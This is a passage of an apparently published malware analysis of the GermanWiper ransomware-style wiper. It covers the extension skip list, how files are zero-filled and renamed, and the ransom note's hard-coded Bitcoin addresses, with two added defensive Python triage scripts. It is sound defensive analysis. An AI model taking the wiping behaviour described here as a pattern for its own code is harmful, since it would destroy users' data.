<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ldf</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.lnk</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.LNK</span></div>
</td><td style="border-bottom: solid #ffffff 1pt; border-left: solid #ffffff 1pt; border-right: solid #ffffff 1pt; border-top: solid #ffffff 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.mod</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.MOD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.mpa</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.MPA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.msc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.MSC</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">msp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.MSP</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.msstyles</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.MSSTYLES</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.msu</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.MSU</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.nls</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.NLS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.nomedia</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.NOMEDIA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ocx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.OCX</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.prf</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.PRF</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.psl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.PSL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.rom</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.ROM</span></div>
</td><td style="border-bottom: solid #ffffff 1pt; border-left: solid #ffffff 1pt; border-right: solid #ffffff 1pt; border-top: solid #ffffff 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.rtp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.RTP</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.scr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.SCR</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.shs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.SHS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.spl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.SPL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.sys</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.SYS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.theme</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.THEME</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.themepack</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.THEMEPACK</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.wpx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.WPX</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.lock</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.LOCK</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.hta</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.HTA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.msi</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.MSI</span></div>
<br />
<br /></td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "georgia"; font-size: 13.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="376" src="https://lh5.googleusercontent.com/J5-FuePVl_KWWwyG6kmztVm1-u55hdcnunmC9Mb9v-w0Mv6Bo4F5YfbYN_0Mc0ZLuqZ7OlFB5vYBndtyyqmKcdgwoMOQZUO4NXc-vmWHnA4xGzeOGP8VVoCh8cS0TvCNi0qcY2Yd" style="border: none;" width="624" /></span></div>
<h1 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Wiping data</span></h1>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GermanWiper overwrites the file content with zero bytes and appends five randomly generated characters as a new extension to the blanked file.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "georgia"; font-size: 13.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="301" src="https://lh5.googleusercontent.com/hqOEwTcnnnVLOmIhWpZavRtVmuK7ncu7su1NzK7CI_0hCI6l0HRjVasPmURD0XYFAZL1buv4SRxU94RkZlbVxalB2hGjWr4vbyUD74M2PdCeGdCS0wBT0i3fDnxhRIZmSVVkh5CR" style="border: none;" width="487" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "georgia"; font-size: 13.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="94" src="https://lh4.googleusercontent.com/gvzj5WzDkeKHiu_rmfrgMxISZFih22T6uNWuCwjAZySiPos2eCzExtFP38UQtCDJ9fBINF0PAqXVwjM0UZlshRMWFgX8FVhIP_a6a3d4eVuqtmGXWkMEyMt7z0OVcTfz4tvRlKdB" style="border: none;" width="325" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "georgia"; font-size: 13.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="386" src="https://lh5.googleusercontent.com/zbltyMWnxjy7e1CHsinGUkWOXPvICKlDUiv3o-Bk-i4FF0v0IiBH22RYfBEkpDQMy5MK91VcVUa2S6mI7hbzowq1MFm6ZQVIOJiNCE3xy5vTprV5ncj_X2JNYMW3S-iWUQUm4TEN" style="border: none;" width="697" /></span></div>
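<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">As an added triage example (not code from the original analysis), the Python script below walks a directory tree and lists files that match the wiper's output pattern described above: content consisting only of zero bytes plus a five-character extension appended to the original name. It assumes the five characters are alphanumeric (the write-up does not say), and the sample tree it builds is constructed data.</span></div>

```python
import re
import tempfile
from pathlib import Path

# Assumption: the five random characters are alphanumeric; the write-up only
# says "five randomly generated characters", so widen this if samples differ.
WIPED_EXT = re.compile(r"^\.[A-Za-z0-9]{5}$")
CHUNK = 1 << 20  # read in 1 MiB chunks so large files are not loaded whole


def is_zero_filled(path: Path) -> bool:
    """True if the file is non-empty and every byte is 0x00."""
    seen_data = False
    with path.open("rb") as f:
        while True:
            chunk = f.read(CHUNK)
            if not chunk:
                return seen_data
            seen_data = True
            if chunk.count(0) != len(chunk):
                return False


def find_wiped_files(root) -> list:
    """Return files under `root` that match GermanWiper's output pattern:
    a five-character random extension appended to the original name and
    content consisting only of zero bytes."""
    hits = []
    for p in Path(root).rglob("*"):
        if p.is_file() and WIPED_EXT.match(p.suffix) and is_zero_filled(p):
            hits.append(p)
    return sorted(hits)


def build_sample_tree(root) -> Path:
    """Populate `root` with constructed sample files (not real victim data)."""
    root = Path(root)
    (root / "docs").mkdir(parents=True, exist_ok=True)
    (root / "docs" / "invoice.docx.Qz8Lk").write_bytes(b"\x00" * 4096)   # wiped
    (root / "photo.jpg.a1B2c").write_bytes(b"\x00" * (2 * CHUNK + 17))   # wiped, spans chunks
    (root / "notes.txt").write_bytes(b"\x00\x00hello")                  # real data, normal extension
    (root / "empty.Ab3xQ").write_bytes(b"")                              # empty file, not a wipe
    (root / "data.bin.Ab3xQ").write_bytes(b"\x00" * 10 + b"\x01")       # extension matches, content does not
    return root


def demo_run() -> list:
    """Build the sample tree in a temporary directory and return the
    relative names of the files flagged as wiped."""
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_tree(tmp)
        return [p.relative_to(root).as_posix() for p in find_wiped_files(root)]


if __name__ == "__main__":
    for name in demo_run():
        print("wiped:", name)
```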
<h1 dir="ltr" style="line-height: 1.2; margin-bottom: 6pt; margin-top: 10pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Ransom note</span></h1>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">After wiping the files, it creates an .html file containing the ransom note. The content of this file is as follows:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "georgia"; font-size: 13.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="505" src="https://lh6.googleusercontent.com/cTgmAcer7FySG3n46Hqhhh7DA1kJZ3xZ048cJUbPOfAwmyUdfB4YV9U-7aaxZyTgg6YAo_5_ttuethcmvGd2uTjKPGDhG0KEobHw2voyLwLewHMZlTDrNNkKH9zCpwH-qnCWk_h5" style="border: none;" width="605" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The ransom note also names a Bitcoin account:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "georgia"; font-size: 13.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="279" src="https://lh5.googleusercontent.com/snw-l_CNEHtE2TtFU2MP1HspuMwE2Qmc1s3pGACAs9-TfV65ewdEMXboUxhn6fjqwcsCdVuAuD6GIbf3NSh32sSfebjd9JGCEZORgSIwbj6h52PyzIv2-QBVO4fzZCA1e9JSz89P" style="border: none;" width="607" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The note claims that the Bitcoin account is generated individually for each victim. Dynamic analysis showed instead that the wiper carries a hard-coded list of Bitcoin addresses and picks one of them at random for each victim. The list is stored Base64-encoded in the '.data' section.</span></div>
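<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">As an added analyst-side example (not code from the original analysis), the Python script below pulls Base64 candidates out of a .data-like byte blob, decodes them and checks each result with the Base58Check checksum that legacy Bitcoin addresses carry, so that a character added or dropped while decoding is caught before the value lands in an IoC list. It assumes the strings sit NUL-separated in the section; the sample blob is constructed and uses the public genesis-block address as the known-valid reference.</span></div>

```python
import base64
import hashlib
import re

# Base58 alphabet used by legacy Bitcoin addresses (no 0, O, I, l)
B58_ALPHABET = b"123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Base64 runs long enough to hold an address. Assumption: the strings are
# stored as NUL-separated ASCII, which is how the sample blob below is built.
B64_RE = re.compile(rb"[A-Za-z0-9+/]{20,}={0,2}")


def b58decode(s: str) -> bytes:
    """Decode a Base58 string; leading '1' characters become leading 0x00 bytes."""
    n = 0
    for ch in s.encode("ascii"):
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError(f"not a Base58 character: {chr(ch)!r}")
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading_ones = len(s) - len(s.lstrip("1"))
    return b"\x00" * leading_ones + body


def is_valid_btc_address(addr: str) -> bool:
    """Base58Check test for a legacy (P2PKH/P2SH) address: 25 decoded bytes
    whose last 4 equal the first 4 bytes of double-SHA256 over the other 21."""
    try:
        raw = b58decode(addr)
    except (ValueError, UnicodeEncodeError):
        return False
    if len(raw) != 25:
        return False
    payload, checksum = raw[:21], raw[21:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


def extract_addresses(blob: bytes) -> list:
    """Decode every Base64 candidate in `blob` and report whether the result is
    a checksum-valid Bitcoin address. Returns (decoded_text, is_valid) pairs."""
    results = []
    for m in B64_RE.finditer(blob):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # malformed Base64 or not ASCII text: skip it
        results.append((text, is_valid_btc_address(text)))
    return results


# Constructed stand-in for the .data section. The first address is the
# well-known Bitcoin genesis-block address (a public reference value, used
# only because its checksum is known to verify); the second is a copy with
# its last character altered; the third is unrelated Base64 text.
GENESIS_ADDR = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
CORRUPT_ADDR = GENESIS_ADDR[:-1] + "b"
SAMPLE_DATA = (
    b"\x00" * 8
    + base64.b64encode(GENESIS_ADDR.encode()) + b"\x00"
    + base64.b64encode(CORRUPT_ADDR.encode()) + b"\x00"
    + base64.b64encode(b"just another string in .data") + b"\x00" * 4
)

if __name__ == "__main__":
    for text, ok in extract_addresses(SAMPLE_DATA):
        print(f"{'valid  ' if ok else 'invalid'}  {text}")
```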
<b style="font-weight: normal;"><br /></b>
<br />
<b style="font-weight: normal;"><br /></b><span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">After decoding, the list contains the following Bitcoin addresses:</span><br />
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="margin-left: -4.5pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="330"></col><col width="345"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #ffffff 1pt; border-left: solid #ffffff 1pt; border-right: solid #ffffff 1pt; border-top: solid #ffffff 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1KjBUvN4Gfipi3bGmuAPDcJEqx48Nx5m4i</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">17BJR98G3bpycgoicVVWHLmt1n7jwC3HTk</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">14XhwV3iBMcLE8qURtk4q2TR53oMSNgZHZ</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">17zGcqKji84sYg6XxefLFvkZouHMKQfSrb</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1LRMFKpSKhrobVJa1uo5V7pnYnEV7S8hZE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">135ug1diEkaGmTaHh4vP1kLLgswRVmZbKw</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1NXZg59BzWSextDuvspbCJ6NRqHT4T7jbM</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">19sd86duTh7vkYUwMDJirP1F513Tvwo7fv</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1JjkbfjDsi1UqqBgcGtsMdZefFMcVukwVa</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1PyZ6yQdnMpVn5o9SfdaPEzAH137Ys9KHn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1CQjaKJd8YKuvzjhjtCKy8QGP9CY4X6Xyc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1J1MBbgNoB9pJXhzZs6DtnpgHPzaeqCx2x</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
